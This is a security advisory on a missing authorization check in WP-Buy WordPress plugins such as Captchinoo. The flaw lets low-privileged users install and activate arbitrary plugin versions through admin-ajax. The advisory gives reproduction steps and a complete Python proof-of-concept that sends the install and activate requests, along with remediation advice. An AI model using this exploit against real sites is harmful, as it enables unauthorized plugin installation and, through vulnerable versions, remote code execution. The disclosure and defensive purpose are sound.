WP-Buy WordPress Plugins Vulnerable to Arbitrary Plugin Installation and Activation via Low Privilege Users

Vulnerability

Multiple WordPress plugins by WP-Buy are affected; the advisory names Captchinoo, Google reCAPTCHA for Admin Login Page in versions prior to 2.4. The plugins register an admin-ajax handler, 'cp_plugins_do_button_job_later_callback' (reached through the 'do_button_job_later' action), that installs plugins from the WordPress.org repository on request. The handler is reachable by authenticated low-privileged users, so it is effectively missing the authorization check that the built-in plugin installer applies (the 'install_plugins' and 'activate_plugins' capabilities). A low-privileged user can therefore install any plugin from the repository, including a specific version, and can call the same handler to activate an installed plugin. Installing and activating a plugin with a known vulnerability turns this authorization flaw into a path to more critical issues such as remote code execution.

Impact

An attacker with only a low-privileged account can install and activate arbitrary plugins on the site. Because the handler accepts a specific version, the attacker can choose a plugin release with a known exploitable flaw and then activate it, chaining this missing authorization check into remote code execution and site compromise.

Reproduction

To reproduce this vulnerability, authenticate as a low-privileged user (the endpoint is the authenticated admin-ajax entry point, so the request must carry that user's logged-in session cookie) and send a POST request to '/wp-admin/admin-ajax.php' with the 'action' parameter set to 'do_button_job_later' and the 'slug' parameter containing the desired plugin slug and version. This triggers installation of the specified plugin from the WordPress repository. To activate an installed plugin, send the same request but replace the 'slug' parameter with a 'plugin_file' parameter containing the plugin's file name. A successful exploit is visible afterwards as a new or newly active entry in the site's Plugins list that no administrator added.
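The two requests described above as a small standard-library client. This is an added example, not code from the WP-Buy plugins or from the original advisory, and it is meant for an authorised lab installation only. The base URL, the session cookie, the plugin slug and the plugin file name are placeholders the tester supplies; the cookie is assumed to be a valid WordPress logged-in session of a low-privileged user, and because the advisory does not say how the plugin expects the version to be encoded inside 'slug', the value is passed through unchanged.

```python
"""
Added example (not the plugin's or the advisory's own code): a minimal client
for the two admin-ajax requests in the reproduction steps.

Assumptions, labelled as such:
  - base_url, cookie, slug and plugin_file are placeholders supplied by the
    tester from an authorised lab site.
  - cookie is a WordPress logged-in session cookie string for a low-privileged
    user; admin-ajax.php actions registered with wp_ajax_ require it.
  - How the version is encoded in 'slug' is not stated in the advisory, so the
    value is sent verbatim.
"""
import sys
import urllib.error
import urllib.parse
import urllib.request

AJAX_PATH = "/wp-admin/admin-ajax.php"
ACTION = "do_button_job_later"  # the admin-ajax action named in the advisory


def build_install_request(base_url: str, slug: str) -> tuple[str, bytes]:
    """Return (url, urlencoded body) asking the handler to install `slug`."""
    body = urllib.parse.urlencode({"action": ACTION, "slug": slug}).encode()
    return base_url.rstrip("/") + AJAX_PATH, body


def build_activate_request(base_url: str, plugin_file: str) -> tuple[str, bytes]:
    """Return (url, urlencoded body) asking the handler to activate `plugin_file`.

    `plugin_file` is assumed to be in WordPress's usual 'directory/file.php'
    form; the advisory itself only says "the plugin's file name".
    """
    body = urllib.parse.urlencode({"action": ACTION, "plugin_file": plugin_file}).encode()
    return base_url.rstrip("/") + AJAX_PATH, body


def send(url: str, body: bytes, cookie: str, timeout: float = 60.0) -> tuple[int, str]:
    """POST the form body with the supplied session cookie; return (status, text).

    HTTP error responses are returned rather than raised so the caller can see
    what the handler answered (e.g. a 403 from a patched version).
    """
    req = urllib.request.Request(
        url,
        data=body,
        method="POST",
        headers={
            "Cookie": cookie,
            "Content-Type": "application/x-www-form-urlencoded",
            "X-Requested-With": "XMLHttpRequest",
        },
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode(errors="replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode(errors="replace")


if __name__ == "__main__":
    # usage: python poc.py <base_url> "<cookie header value>" <slug> <plugin_file>
    # All four arguments are placeholders the tester provides.
    base, cookie, slug, plugin_file = sys.argv[1:5]

    # Step 1: install the plugin (plugin installation takes a while on most hosts).
    status, text = send(*build_install_request(base, slug), cookie)
    print("install:", status, text[:200])

    # Step 2: activate it by its plugin file name.
    status, text = send(*build_activate_request(base, plugin_file), cookie)
    print("activate:", status, text[:200])
```

Run it against a lab copy only; on a patched site (2.4 or later for the Captchinoo plugin) the expected result is that the handler refuses the request for a low-privileged session and no plugin appears in the Plugins list.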

Remediation

Users are advised to update to the latest version of each affected WP-Buy plugin. For the Captchinoo, Google reCAPTCHA for Admin Login Page plugin, the patched version is 2.4; verify the installed version in the Plugins screen rather than assuming an auto-update ran. Because a successful exploit leaves behind a plugin that no administrator installed or activated, review the installed and active plugin list (and the site's audit log, if one is kept) for unexpected entries before and after updating, and remove anything that cannot be accounted for.

Added: May 15, 2026, 9:51 AM
Updated: May 15, 2026, 9:51 AM

Vulnerability Rating

Custom Algorithm

spread: 1.0
impact: 5.0
exploitability: 6.8
remediation: 7.7
relevance: 0.0
threat: 6.4
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.